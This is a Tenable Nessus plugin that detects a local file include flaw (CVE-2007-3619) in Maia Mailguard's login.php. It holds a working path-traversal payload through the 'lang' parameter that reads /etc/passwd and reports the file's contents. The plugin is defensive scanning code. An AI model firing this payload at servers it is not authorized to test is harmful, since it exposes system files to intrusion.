#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP script that is susceptible to a
local file include attack. 

Description :

The remote host is running Maia Mailguard, a spam and virus management
system written in PHP. 

The version of Maia Mailguard installed on the remote host fails to
sanitize user input to the 'lang' parameter before using it to include
PHP code in 'login.php'.  Regardless of PHP's 'register_globals'
setting, an unauthenticated remote attacker may be able to exploit
this issue to view arbitrary files or to execute arbitrary PHP code on
the remote host, subject to the privileges of the web server user id. 

See also :

http://archives.neohapsis.com/archives/bugtraq/2007-07/0041.html
http://www.maiamailguard.org/maia/ticket/479
http://www.maiamailguard.org/maia/changeset/1184

Solution :

Apply the patch from Changeset 1184. 

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


if (description)
{
  script_id(25673);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2007-3619");
  script_bugtraq_id(24770);
  script_xref(name:"OSVDB", value:"37884");

  script_name(english:"Maia Mailguard lang Parameter Local File Include Vulnerability");
  script_summary(english:"Tries to read a local file with Maia Mailguard");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/mailguard", "/maia", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to retrieve a local file.
  file = "/../../../../../../../../../../../../etc/passwd%00";
  req = http_get(
    item:string(
      dir, "/login.php?",
      "lang=", file, ".txt"
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if...
  if (
    # there's an entry for root or...
    egrep(pattern:"root:.*:0:[01]:", string:res) ||
    # we get an error because magic_quotes was enabled or...
    egrep(pattern:"main\(\): Failed opening required .+/etc/passwd\\0\.txt", string:res) ||
    # we get an error claiming the file doesn't exist or...
    egrep(pattern:"main\(\): Failed opening required .+/etc/passwd' ", string:res)
  )
  {
    if (egrep(string:res, pattern:"root:.*:0:[01]:"))
      contents = res - strstr(res, "<br />");
    else contents = "";

    if (contents)
    {
      report = string(
        desc,
        "\n\n",
        "Plugin output :\n",
        "\n",
        "Here are the contents of the file '/etc/passwd' that Nessus\n",
        "was able to read from the remote host :\n",
        "\n",
        contents
      );
    }
    else report = desc;

    security_warning(port:port, data:report);
    exit(0);
  }
}
